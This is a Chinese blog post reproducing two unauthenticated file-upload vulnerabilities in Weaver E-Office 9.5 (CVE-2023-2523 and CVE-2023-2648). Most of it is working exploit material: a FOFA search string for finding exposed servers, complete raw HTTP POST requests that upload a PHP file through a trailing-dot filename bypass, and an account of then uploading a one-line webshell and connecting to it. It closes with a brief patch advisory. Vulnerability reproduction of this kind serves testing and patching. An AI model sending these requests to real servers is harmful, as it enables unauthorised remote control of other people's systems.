• 泛微 E-Office文件上传漏洞复现(CVE-2023-2523、CVE-2023-2648)


    0x01 产品简介

          泛微E-Office是一款标准化的协同 OA 办公软件,泛微协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。

    0x02 漏洞概述

    cve-2023-2523

        泛微e-office 9.5版本,源文件 App/Ajax/ajax.php?action=mobile_upload_save 的一些未知功能存在问题。 参数 upload_quwan 的操作导致不受限制的上传,未经身份验证的恶意攻击者通过上传恶意文件,从而获取目标服务器的控制权限。

    cve-2023-2648

        由于泛微e-office 9.5版本源文件/inc/jquery/uploadify/uploadify.php存在问题,对参数Filedata的操作会导致不受限制的上传,未经身份验证的恶意攻击者通过上传恶意文件,从而获取目标服务器的控制权限。

    0x03 影响范围

     泛微 E-Office 9.5

    0x04 复现环境

    FOFA:app="泛微-EOffice"

     0x05 漏洞复现 

    cve-2023-2523——PoC

    1. POST /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save HTTP/1.1
    2. Host: your-ip
    3. Content-Length: 352
    4. Cache-Control: max-age=0
    5. Upgrade-Insecure-Requests: 1
    6. Origin: null
    7. Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
    8. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
    9. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    10. Accept-Encoding: gzip, deflate
    11. Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    12. Connection: close
    13. ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
    14. Content-Disposition: form-data; name="upload_quwan"; filename="1.php."
    15. Content-Type: image/jpeg
    16. <?php phpinfo();?>
    17. ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
    18. Content-Disposition: form-data; name="file"; filename=""
    19. Content-Type: application/octet-stream
    20. ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt--

    bp构造请求包复现

     可以看到,回显了完整的上传路径,尝试访问

    漏洞利用:上传一句话马子

     尝试连接 

    注:必须要使用base64编码 ,不然会报错

     

     

     cve-2023-2648——PoC

    1. POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
    2. Host: your-ip
    3. Content-Length: 204
    4. Cache-Control: max-age=0
    5. Upgrade-Insecure-Requests: 1
    6. Origin: null
    7. Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
    8. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
    9. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    10. Accept-Encoding: gzip, deflate
    11. Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    12. Connection: close
    13. ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
    14. Content-Disposition: form-data; name="Fdiledata"; filename="uploadify.php."
    15. Content-Type: image/jpeg
    16. <?php phpinfo();?>
    17. ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt

     

    上图所示:与 cve-2023-2523的不同点就是,他返回的只有一个随机的文件夹参数,并非完整路径,利用方式都一样,就不展示,各位随意发挥。

    0x06 修复建议

    目前官方已修复以上漏洞,受影响用户可以升级更新到安全版本。

    官方下载链接:https://service.e-office.cn/download

  • 相关阅读:
    【Redis速通】基础知识2 - 常用数据结构
    IIS 解析漏洞复现
    华硕电脑怎么录屏?分享实用录制经验!
    芯片验证方法之极限验证法
    Python 实现动态解析阿里云DNS记录
    6.6 Elasticsearch(六)京淘项目改造
    编写自己的目标跟踪算法
    51.MongoDB聚合操作与索引使用详解
    数据集笔记:T-drive 北京出租车轨迹数据
    HTML标签学习
  • 原文地址:https://blog.csdn.net/qq_41904294/article/details/130832416